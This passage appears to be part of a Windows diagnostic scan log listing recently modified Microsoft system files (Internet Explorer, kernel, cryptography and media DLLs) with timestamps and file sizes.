2019-07-09 19:06 - 2019-06-17 22:39 - 000077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2019-07-09 19:06 - 2019-06-17 22:39 - 000062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2019-07-09 19:06 - 2019-06-17 22:38 - 000341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2019-07-09 19:06 - 2019-06-17 22:38 - 000107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2019-07-09 19:06 - 2019-06-17 22:38 - 000087552 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2019-07-09 19:06 - 2019-06-17 22:38 - 000047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2019-07-09 19:06 - 2019-06-17 22:37 - 000064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2019-07-09 19:06 - 2019-06-17 22:35 - 002297344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2019-07-09 19:06 - 2019-06-17 22:35 - 000199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2019-07-09 19:06 - 2019-06-17 22:34 - 000092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2019-07-09 19:06 - 2019-06-17 22:32 - 000315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2019-07-09 19:06 - 2019-06-17 22:32 - 000047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2019-07-09 19:06 - 2019-06-17 22:32 - 000030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2019-07-09 19:06 - 2019-06-17 22:30 - 000476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2019-07-09 19:06 - 2019-06-17 22:30 - 000152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2019-07-09 19:06 - 2019-06-17 22:29 - 000663040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2019-07-09 19:06 - 2019-06-17 22:29 - 000620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2019-07-09 19:06 - 2019-06-17 22:29 - 000115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2019-07-09 19:06 - 2019-06-17 22:21 - 000416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2019-07-09 19:06 - 2019-06-17 22:21 - 000262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2019-07-09 19:06 - 2019-06-17 22:20 - 000809472 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2019-07-09 19:06 - 2019-06-17 22:20 - 000728064 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2019-07-09 19:06 - 2019-06-17 22:19 - 015311872 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2019-07-09 19:06 - 2019-06-17 22:17 - 002136064 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2019-07-09 19:06 - 2019-06-17 22:17 - 001359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2019-07-09 19:06 - 2019-06-17 22:16 - 000091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2019-07-09 19:06 - 2019-06-17 22:16 - 000073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2019-07-09 19:06 - 2019-06-17 22:16 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2019-07-09 19:06 - 2019-06-17 22:13 - 000168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2019-07-09 19:06 - 2019-06-17 22:13 - 000076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2019-07-09 19:06 - 2019-06-17 22:11 - 000279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2019-07-09 19:06 - 2019-06-17 22:10 - 000130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2019-07-09 19:06 - 2019-06-17 22:07 - 004494336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2019-07-09 19:06 - 2019-06-17 22:06 - 004858880 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2019-07-09 19:06 - 2019-06-17 22:04 - 000230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2019-07-09 19:06 - 2019-06-17 22:03 - 013706752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2019-07-09 19:06 - 2019-06-17 22:03 - 002060288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2019-07-09 19:06 - 2019-06-17 22:03 - 000696320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2019-07-09 19:06 - 2019-06-17 22:02 - 001155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2019-07-09 19:06 - 2019-06-17 21:55 - 001557504 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2019-07-09 19:06 - 2019-06-17 21:44 - 004386304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2019-07-09 19:06 - 2019-06-17 21:43 - 000800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2019-07-09 19:06 - 2019-06-17 21:41 - 001323008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2019-07-09 19:06 - 2019-06-17 21:39 - 000710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2019-07-09 19:06 - 2019-06-12 22:25 - 000160488 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2019-07-09 19:06 - 2019-06-12 22:21 - 000732160 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2019-07-09 19:06 - 2019-06-12 10:23 - 004057320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2019-07-09 19:06 - 2019-06-12 10:23 - 003964136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2019-07-09 19:06 - 2019-06-12 10:22 - 001314104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2019-07-09 19:06 - 2019-06-12 10:21 - 012574208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2019-07-09 19:06 - 2019-06-12 10:21 - 011411968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2019-07-09 19:06 - 2019-06-12 10:21 - 001114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2019-07-09 19:06 - 2019-06-12 10:21 - 000666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2019-07-09 19:06 - 2019-06-12 10:21 - 000617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2019-07-09 19:06 - 2019-06-12 10:21 - 000275968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2019-07-09 19:06 - 2019-06-12 10:21 - 000179712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2019-07-09 19:06 - 2019-06-12 10:21 - 000172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2019-07-09 19:06 - 2019-06-12 10:21 - 000096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2019-07-09 19:06 - 2019-06-12 10:21 - 000082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2019-07-09 19:06 - 2019-06-12 10:21 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 003207168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 001329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000555520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000442368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000261632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000070144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000046592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssign32.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2019-07-09 19:06 - 2019-06-12 10:20 - 000002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 001177088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 001005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000373248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000195072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:19 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:15 - 000631680 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2019-07-09 19:06 - 2019-06-12 10:11 - 000708328 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2019-07-09 19:06 - 2019-06-12 10:11 - 000262376 _____ (Microsoft Corporation) C:\Windows\system32\hal.dll
2019-07-09 19:06 - 2019-06-12 10:11 - 000153832 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2019-07-09 19:06 - 2019-06-12 10:11 - 000094440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys
2019-07-09 19:06 - 2019-06-12 10:10 - 005550824 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2019-07-09 19:06 - 2019-06-12 10:10 - 000095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2019-07-09 19:06 - 2019-06-12 10:09 - 001664352 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 014637568 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 012574720 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2019-07-09 19:06 - 2019-06-12 10:08 - 000782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000361984 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000236032 _____ (Microsoft Corporation) C:\Windows\system32\srvsvc.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000094208 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\sscore.dll
2019-07-09 19:06 - 2019-06-12 10:08 - 000005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2019-07-09 19:06 - 2019-06-12 10:08 - 000005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 004120576 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 001574400 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 001484800 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 001472512 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 001211392 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 001202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 001162752 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 001068544 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000733184 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000632320 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000499712 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000433152 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000408576 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000317440 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000190976 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000187904 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000081920 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\mssign32.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000037376 _____ (Microsoft Corporation) C:\Windows\system32\pcadm.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000011264 _____ (Microsoft Corporation) C:\Windows\system32\msmmsp.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000008704 _____ (Microsoft Corporation) C:\Windows\system32\pcaevts.dll
2019-07-09 19:06 - 2019-06-12 10:07 - 000002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000680960 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000438784 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000295936 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000123904 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2019-07-09 19:06 - 2019-06-12 10:06 - 000004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2019-07-09 19:06 - 2019-06-12 10:06 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
